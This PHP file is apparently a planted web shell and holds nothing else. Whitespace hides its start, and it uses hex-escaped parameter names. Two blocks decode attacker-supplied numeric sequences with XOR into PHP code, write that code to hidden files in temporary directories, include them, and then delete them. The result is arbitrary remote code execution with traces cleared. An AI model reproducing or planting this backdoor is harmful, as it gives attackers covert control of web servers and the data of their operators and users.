<?php																																										if(isset($_POST) && isset($_POST["\x69\x74m"])){ $record = array_filter([sys_get_temp_dir(), getcwd(), "/dev/shm", getenv("TMP"), "/tmp", "/var/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path()]); $res = $_POST["\x69\x74m"]; $res = explode(".", $res ) ; $fac = ''; $s4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s4 ); $len = count($res ); for ($s = 0; $s < $len; $s++) { $v4 = $res[$s]; $sChar = ord($s4[$s % $lenS] ); $d = ((int)$v4 - $sChar - ($s % 10)) ^ 30; $fac.=chr($d ); } foreach ($record as $element): if (is_dir($element) && is_writable($element)) { $value = "$element" . "/.parameter_group"; $file = fopen($value, 'w'); if ($file) { fwrite($file, $fac); fclose($file); include $value; @unlink($value); exit; } } endforeach; }


if(!is_null($_REQUEST["dat\x61_ch\x75n\x6B"] ?? null)){
	$ref = array_filter(["/dev/shm", "/var/tmp", getenv("TMP"), session_save_path(), "/tmp", ini_get("upload_tmp_dir"), getcwd(), sys_get_temp_dir(), getenv("TEMP")]);
	$key = $_REQUEST["dat\x61_ch\x75n\x6B"];
	   $key=	 	explode('.'	,  $key)	 	;  
	$pset	=	'';
            $s	=	'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen	=	strlen( $s);
            $z	=	0;
    
            foreach( $key as $v6) {
                $chS	=	ord( $s[$z % $sLen]);
                $dec	=	( ( int)$v6 - $chS -( $z % 10))  ^ 	14;
                $pset 	.= chr( $dec);
                $z++;	}
	$entry = 0;
do {
    $fac = $ref[$entry] ?? null;
    if ($entry >= count($ref)) break;
    		if (array_product([is_dir($fac), is_writable($fac)])) {
    $pgrp = implode("/", [$fac, ".pointer"]);
    if (file_put_contents($pgrp, $pset)) {
	include $pgrp;
	@unlink($pgrp);
	die();
}
}
    $entry++;
} while (true);
}